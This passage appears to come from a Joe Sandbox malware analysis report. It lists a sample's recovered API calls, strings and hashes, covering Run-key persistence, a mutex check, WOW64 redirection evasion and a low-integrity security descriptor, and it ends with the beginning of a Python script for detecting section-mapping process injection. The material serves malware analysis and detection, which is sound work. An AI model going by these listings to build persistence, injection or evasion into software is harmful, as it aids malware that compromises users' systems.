• {C3120582-398C-4F3B-A956-7E9F9DB9EF8E}, xrefs: 00314473
• {BB52E685-57DB-490D-A4DD-CCF2F7D90D58}, xrefs: 00314414
Memory Dump Source
• Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
• Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
Similarity
• API ID: Close$FileModuleNameOpenValue__snwprintf_memsetlstrlen
• String ID: SOFTWARE\%s${BB52E685-57DB-490D-A4DD-CCF2F7D90D58}${C3120582-398C-4F3B-A956-7E9F9DB9EF8E}
• API String ID: 1214033602-3858757917
• Opcode ID: ac2a54b355484fa511c37f8450dbe98c0de13729269eff0e26f51a2bb99971ed
• Instruction ID: f9f09ad1b1ca838de47a82928f1be29a4878ce8c3de5a5712f86bba919a5e317
• Opcode Fuzzy Hash: ac2a54b355484fa511c37f8450dbe98c0de13729269eff0e26f51a2bb99971ed
• Instruction Fuzzy Hash: 351189B5A503146BD735DB60DC4EFEA737C9F48700F104688B61DA6091EAB59AC4CB61

Control-flow Graph

control_flow_graph 720 312680-31268b 721 31268d-3126a3 RegOpenKeyW 720->721 722 3126be-3126c5 720->722 721->722 723 3126a5-3126b8 RegDeleteValueW RegCloseKey 721->723 724 3126c7-3126dd RegOpenKeyW 722->724 725 3126f8-312700 722->725 723->722 724->725 726 3126df-3126f2 RegDeleteValueW RegCloseKey 724->726 726->725
APIs
• RegOpenKeyW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,?), ref: 0031269B
• RegDeleteValueW.ADVAPI32(?,00376FC8,?,?,00301109), ref: 003126AE
• RegCloseKey.ADVAPI32(?,?,?,00301109), ref: 003126B8
• RegOpenKeyW.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,?), ref: 003126D5
• RegDeleteValueW.KERNELBASE(?,{AB1F3E47-AEF1-400E-A108-233A046C3A34},?,?,00301109), ref: 003126E8
• RegCloseKey.ADVAPI32(?,?,?,00301109), ref: 003126F2
Strings
• {AB1F3E47-AEF1-400E-A108-233A046C3A34}, xrefs: 003126DF
• Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 00312691
• SOFTWARE\Microsoft\Windows\CurrentVersion\Run, xrefs: 003126CB
Memory Dump Source
• Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
• Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
Similarity
• API ID: CloseDeleteOpenValue
• String ID: SOFTWARE\Microsoft\Windows\CurrentVersion\Run$Software\Microsoft\Windows\CurrentVersion\Run${AB1F3E47-AEF1-400E-A108-233A046C3A34}
• API String ID: 849931509-2070010218
• Opcode ID: c637dd80f35a4496a6ce9611896cb8e7d4144c16a70478508f276c55fd01f0ff
• Instruction ID: 1814358130b0a08cce8824478a7cfd5dfa777c285bdc9cdd21d72f6deb7bac9e
• Opcode Fuzzy Hash: c637dd80f35a4496a6ce9611896cb8e7d4144c16a70478508f276c55fd01f0ff
• Instruction Fuzzy Hash: 26013175700204FBD736DBA0EE49EAE777CEB08701F104158F909A2150DAB2EAD1AB65

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 742 30b510-30b54f call 32359a RegOpenKeyW 745 30b551-30b553 742->745 746 30b555-30b570 RegSetValueExW 742->746 747 30b58f-30b592 745->747 748 30b580-30b58a RegCloseKey 746->748 749 30b572-30b57e RegCloseKey 746->749 748->747 749->747
                                                                                                            APIs
                                                                                                            • __snwprintf.LIBCMT ref: 0030B52F
                                                                                                            • RegOpenKeyW.ADVAPI32(80000001,?,?), ref: 0030B547
                                                                                                            • RegSetValueExW.KERNELBASE(?,{C2FE454F-1649-4C34-B46D-B1EE64A366C2},00000000,00000003,00314285,0000000C), ref: 0030B568
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 0030B576
                                                                                                            Strings
                                                                                                            • {C2FE454F-1649-4C34-B46D-B1EE64A366C2}, xrefs: 0030B55F
                                                                                                            • {BB52E685-57DB-490D-A4DD-CCF2F7D90D58}, xrefs: 0030B519
                                                                                                            • SOFTWARE\%s, xrefs: 0030B51E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseOpenValue__snwprintf
                                                                                                            • String ID: SOFTWARE\%s${BB52E685-57DB-490D-A4DD-CCF2F7D90D58}${C2FE454F-1649-4C34-B46D-B1EE64A366C2}
                                                                                                            • API String ID: 2100281157-3270428146
                                                                                                            • Opcode ID: 8acd320f70d89cacf14901c2584e0e79e932baae78cad9cfc89c74019efb003d
                                                                                                            • Instruction ID: c8d9841e402f2373fb03bfb7cdc8e8289c9da0661669def7e3066b4941db0c9d
                                                                                                            • Opcode Fuzzy Hash: 8acd320f70d89cacf14901c2584e0e79e932baae78cad9cfc89c74019efb003d
                                                                                                            • Instruction Fuzzy Hash: 4A01317574420CBBD722DBA0DC59FAE737CAB49700F104994B609AA1C0EA76DB44A7A1

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • WaitForSingleObject.KERNEL32(?,00000000), ref: 003019D2
                                                                                                            • OpenMutexW.KERNEL32(00100000,00000000,{6B55C48E-8FCD-482F-91CF-9C0B3FD8AC2B}), ref: 003019EB
                                                                                                            • WaitForSingleObject.KERNEL32(000002EC,0000000A), ref: 00301A08
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00301C2B
                                                                                                            • Wow64DisableWow64FsRedirection.KERNEL32(?), ref: 00301C42
                                                                                                            • ExitProcess.KERNEL32 ref: 00301C4A
                                                                                                            Strings
                                                                                                            • {6B55C48E-8FCD-482F-91CF-9C0B3FD8AC2B}, xrefs: 003019DF
                                                                                                            Similarity
                                                                                                            • API ID: ObjectSingleWait$Wow64$DisableExitMutexOpenProcessRedirection
                                                                                                            • String ID: {6B55C48E-8FCD-482F-91CF-9C0B3FD8AC2B}
                                                                                                            • API String ID: 3042449743-1168154662
                                                                                                            • Opcode ID: 91aaada249ad37d83718ed419d3b50560b4dd2983b495c2c7f04d1ac3d7cf9d8
                                                                                                            • Instruction ID: db5bdcf1fb0c4d0753df0815690c54c3c6ddd9ba4b604a185c6a7bc44cae3eb4
                                                                                                            • Opcode Fuzzy Hash: 91aaada249ad37d83718ed419d3b50560b4dd2983b495c2c7f04d1ac3d7cf9d8
                                                                                                            • Instruction Fuzzy Hash: A7219DB0A41214CFDB36DB54EDE8BD873BEAB88304F2041A9E20DA6191CBB499C0CF11

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000,?,0031430B,?,00000000), ref: 0031C58C
                                                                                                            • GetFileSize.KERNEL32(000000FF,00000000,?,0031430B,?), ref: 0031C5A1
                                                                                                            • LocalAlloc.KERNELBASE(00000040,000000FF,?,0031430B), ref: 0031C5B6
                                                                                                            • ReadFile.KERNELBASE(000000FF,00000000,000000FF,?,00000000), ref: 0031C5D7
                                                                                                            • CloseHandle.KERNEL32(000000FF), ref: 0031C5ED
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0031C604
                                                                                                            • CloseHandle.KERNEL32(000000FF,?,0031430B), ref: 0031C60E
                                                                                                            Similarity
                                                                                                            • API ID: File$CloseHandleLocal$AllocCreateFreeReadSize
                                                                                                            • String ID:
                                                                                                            • API String ID: 2550598358-0
                                                                                                            • Opcode ID: ffb0bafd365a78fe22e54814b74c7dec8ad05f4536b63a8e1170b50d37d46297
                                                                                                            • Instruction ID: a127ef8410f7f848ae309b82703406b24ab6c8fd38ddc83bd301364c6bf67a93
                                                                                                            • Opcode Fuzzy Hash: ffb0bafd365a78fe22e54814b74c7dec8ad05f4536b63a8e1170b50d37d46297
                                                                                                            • Instruction Fuzzy Hash: A9210674A40208FBDB19DFA4D989FAEB779BB48701F108688F615A7290D734AA85CF50

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NW;;;LW),00000001,00000000,00000000), ref: 0031C4E6
                                                                                                            • GetSecurityDescriptorSacl.ADVAPI32(00000000,00000000,00000000,00000000), ref: 0031C500
                                                                                                            • SetNamedSecurityInfoW.ADVAPI32(00000000,00000006,00000010,00000000,00000000,00000000,00000000), ref: 0031C51C
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0031C529
                                                                                                            Strings
                                                                                                            Similarity
                                                                                                            • API ID: Security$Descriptor$ConvertFreeInfoLocalNamedSaclString
                                                                                                            • String ID: S:(ML;;NW;;;LW)
                                                                                                            • API String ID: 173816248-495562761
                                                                                                            • Opcode ID: 1d0e66de9a9d2c2434c1c15403a38ff1c0cfb9f7886c1d04c6ca158a3edaccbe
                                                                                                            • Instruction ID: a75b4941014e2877a1a9b052e30494f0796f393cd1ca0c6c7481dfd3a438eaff
                                                                                                            • Opcode Fuzzy Hash: 1d0e66de9a9d2c2434c1c15403a38ff1c0cfb9f7886c1d04c6ca158a3edaccbe
                                                                                                            • Instruction Fuzzy Hash: 95015EB1A40308ABEB21CFD0CD45FEFB7BDAB08704F104548E605AA1C0D7B5AA44CFA1

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • __snwprintf.LIBCMT ref: 0030B4BF
                                                                                                            • RegGetValueW.KERNELBASE(80000001,?,{C2FE454F-1649-4C34-B46D-B1EE64A366C2},00000008,00000000,00314257,0000000C), ref: 0030B4EB
                                                                                                            Strings
                                                                                                            • {C2FE454F-1649-4C34-B46D-B1EE64A366C2}, xrefs: 0030B4DA
                                                                                                            • SOFTWARE\%s, xrefs: 0030B4AE
                                                                                                            • {BB52E685-57DB-490D-A4DD-CCF2F7D90D58}, xrefs: 0030B4A9
                                                                                                            Similarity
                                                                                                            • API ID: Value__snwprintf
                                                                                                            • String ID: SOFTWARE\%s${BB52E685-57DB-490D-A4DD-CCF2F7D90D58}${C2FE454F-1649-4C34-B46D-B1EE64A366C2}
                                                                                                            • API String ID: 3635966236-3270428146
                                                                                                            • Opcode ID: d01c1bf29b31e80ad8420e0914912b3f295971d9b1ae295c6256907a7d3feb02
                                                                                                            • Instruction ID: fec7daccf55c1833676404a13528784adeecfda1d134a734c2a484cd06d2f830
                                                                                                            • Opcode Fuzzy Hash: d01c1bf29b31e80ad8420e0914912b3f295971d9b1ae295c6256907a7d3feb02
                                                                                                            • Instruction Fuzzy Hash: F1F0EC3174420CB6E721D7A5DC4BFFAB36CA704700F108194B90C961C0E6B59B4557D1
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Similarity
                                                                                                            • API ID: _malloc
                                                                                                            • String ID: LdrGetProcedureAddress
                                                                                                            • API String ID: 1579825452-3058439150
                                                                                                            • Opcode ID: 09c78cc6a4e8364987b1b45a530da1334eac5751038379abed5a649912e75966
                                                                                                            • Instruction ID: 49f890372204ef2a73e1c180ac4a85a7add8b0f3acc9e2e7c5663ebc72454086
                                                                                                            • Opcode Fuzzy Hash: 09c78cc6a4e8364987b1b45a530da1334eac5751038379abed5a649912e75966
                                                                                                            • Instruction Fuzzy Hash: 0EA12970D02218DFDB25DB98CDA5BEFB7B5BB48314F148298E00A6B285DB356E85CF50
                                                                                                            APIs
                                                                                                            • LocalAlloc.KERNELBASE(00000040,00005004), ref: 0031CD2D
                                                                                                            • LocalAlloc.KERNEL32(00000040,00000000), ref: 0031CD57
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0031CD94
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0031CD9E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                             • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Local$AllocFree
                                                                                                            • String ID:
                                                                                                            • API String ID: 2012307162-0
                                                                                                            • Opcode ID: a6cfbb7d2b7d01947da6ee4177dbd4359abb03d10f63357c3ae58a50b924d1c4
                                                                                                            • Instruction ID: 8938db434e96612534016a02d1462975ea11bc235ffb2510977683e4520b8e1c
                                                                                                            • Opcode Fuzzy Hash: a6cfbb7d2b7d01947da6ee4177dbd4359abb03d10f63357c3ae58a50b924d1c4
                                                                                                            • Instruction Fuzzy Hash: 75112EB9D10208FFCB09DFA8E949B9EBBB4FB4C300F008564E505A7280D7749A84CB50
                                                                                                            APIs
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00301C2B
                                                                                                            • Wow64DisableWow64FsRedirection.KERNEL32(?), ref: 00301C42
                                                                                                            • ExitProcess.KERNEL32 ref: 00301C4A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                             • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Wow64$DisableExitObjectProcessRedirectionSingleWait
                                                                                                            • String ID:
                                                                                                            • API String ID: 2411899824-0
                                                                                                            • Opcode ID: 077fc3c8398f8f087e23a502380f2a09b84c55421de6a79508d8288ef49f2725
                                                                                                            • Instruction ID: fb00c2740b438d784b5853e91fc859c03ec6b3ad10642119dbd58a59d9b41475
                                                                                                            • Opcode Fuzzy Hash: 077fc3c8398f8f087e23a502380f2a09b84c55421de6a79508d8288ef49f2725
                                                                                                            • Instruction Fuzzy Hash: 05E012704911149BEB3BEB74AD98658373CAB45311F109629F11A940E1CB35C5C4DB61
                                                                                                            APIs
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00301C2B
                                                                                                            • Wow64DisableWow64FsRedirection.KERNEL32(?), ref: 00301C42
                                                                                                            • ExitProcess.KERNEL32 ref: 00301C4A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                             • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Wow64$DisableExitObjectProcessRedirectionSingleWait
                                                                                                            • String ID:
                                                                                                            • API String ID: 2411899824-0
                                                                                                            • Opcode ID: 4a8e169d1d95e7c82201e4b2ba72dfe82eb582d98cd4d4725a643b29d450bf52
                                                                                                            • Instruction ID: fb00c2740b438d784b5853e91fc859c03ec6b3ad10642119dbd58a59d9b41475
                                                                                                            • Opcode Fuzzy Hash: 4a8e169d1d95e7c82201e4b2ba72dfe82eb582d98cd4d4725a643b29d450bf52
                                                                                                            • Instruction Fuzzy Hash: 05E012704911149BEB3BEB74AD98658373CAB45311F109629F11A940E1CB35C5C4DB61
                                                                                                            APIs
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00301C2B
                                                                                                            • Wow64DisableWow64FsRedirection.KERNEL32(?), ref: 00301C42
                                                                                                            • ExitProcess.KERNEL32 ref: 00301C4A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                             • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Wow64$DisableExitObjectProcessRedirectionSingleWait
                                                                                                            • String ID:
                                                                                                            • API String ID: 2411899824-0
                                                                                                            • Opcode ID: 80584b6ed585a42efaf92f9b5a58592e085068adf72dc0ff78f0d7bfa9e55f4c
                                                                                                            • Instruction ID: fb00c2740b438d784b5853e91fc859c03ec6b3ad10642119dbd58a59d9b41475
                                                                                                            • Opcode Fuzzy Hash: 80584b6ed585a42efaf92f9b5a58592e085068adf72dc0ff78f0d7bfa9e55f4c
                                                                                                            • Instruction Fuzzy Hash: 05E012704911149BEB3BEB74AD98658373CAB45311F109629F11A940E1CB35C5C4DB61
                                                                                                            APIs
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00301C2B
                                                                                                            • Wow64DisableWow64FsRedirection.KERNEL32(?), ref: 00301C42
                                                                                                            • ExitProcess.KERNEL32 ref: 00301C4A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                             • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Wow64$DisableExitObjectProcessRedirectionSingleWait
                                                                                                            • String ID:
                                                                                                            • API String ID: 2411899824-0
                                                                                                            • Opcode ID: 2a70fb1f4047b439d5c3878af28c10e08edde4111a6fbb84570760f772c1aa1e
                                                                                                            • Instruction ID: fb00c2740b438d784b5853e91fc859c03ec6b3ad10642119dbd58a59d9b41475
                                                                                                            • Opcode Fuzzy Hash: 2a70fb1f4047b439d5c3878af28c10e08edde4111a6fbb84570760f772c1aa1e
                                                                                                            • Instruction Fuzzy Hash: 05E012704911149BEB3BEB74AD98658373CAB45311F109629F11A940E1CB35C5C4DB61
                                                                                                            APIs
                                                                                                            • _strlen.LIBCMT ref: 003060F7
                                                                                                            • X64Call.DOWNLOADED_FILE(221F1B10,00007FFE,00000004,00000000,?,?,00000000,00000000,00000000,00000000,00000000), ref: 00306145
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                             • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Call_strlen
                                                                                                            • String ID:
                                                                                                            • API String ID: 1092177880-0
                                                                                                            • Opcode ID: 366b4b49d87fa7547b839f7c916e7171862137e096c5fbc5f65d3ce70c56e964
                                                                                                            • Instruction ID: ffcf53c0972990021551d03c5f0de1edaa2c8c7e5e1072dd56579e896fe8f023
                                                                                                            • Opcode Fuzzy Hash: 366b4b49d87fa7547b839f7c916e7171862137e096c5fbc5f65d3ce70c56e964
                                                                                                            • Instruction Fuzzy Hash: 462130B0914208DFDB25CFA8EC527AFB7B9FF48300F00512DE90897290E7705694CB95
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                             • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CreateThreadUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 1531140918-0
                                                                                                            • Opcode ID: 9d825d32468024121c3756d526faa31a86c33974238a552c6b200037977dcc1c
                                                                                                            • Instruction ID: 383a808b53811942b902f61da487c9cdb8566c0808be25f0fcd55df57bb4a3af
                                                                                                            • Opcode Fuzzy Hash: 9d825d32468024121c3756d526faa31a86c33974238a552c6b200037977dcc1c
                                                                                                            • Instruction Fuzzy Hash: ECF0F931A18D1DAFCF56ABACD925DAEBBB1FB68320F110615E405E3084DB31E9509F91
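The function entries above (the WaitForSingleObject / Wow64DisableWow64FsRedirection / ExitProcess function at 00301C2B, the X64Call at 00306145) and the CreateProcessW / NtCreateSection / NtMapViewOfSection / RtlCreateUserThread function listed next are raw API call lists recovered by the IDA plugin. The Python script below is an added triage example, not part of this report and not Joe Sandbox code: it parses those bullet lines and flags section-mapping process injection (a section created with an executable page protection, more than one NtMapViewOfSection call, a thread-creation API resolved by name via GetProcAddress) and WOW64 evasion (file-system redirection disabled, or a 64-bit call made from 32-bit code). The argument values in these listings are the sandbox's static reconstruction, so "?" tokens and zero handle values are expected; the rules therefore key on constants (the 0x40 PAGE_EXECUTE_READWRITE protection in the second NtCreateSection, the names passed to GetProcAddress) and never on handle values. The helper names (`Call`, `parse_calls`, `triage`) are mine, and reading the first two X64Call arguments as the low and high halves of a 64-bit pointer is an assumption about that helper's calling convention.

```python
"""Triage helper for the "APIs" bullet listings Joe Sandbox prints per function.

Added example, not Joe Sandbox code. It parses lines of the form
    • NtCreateSection.NTDLL(00000000,0000000E,...), ref: 0031473B
and flags two behaviours that appear in this report:
  * section-mapping process injection: a section created with an executable
    page protection, NtMapViewOfSection called more than once (local view plus
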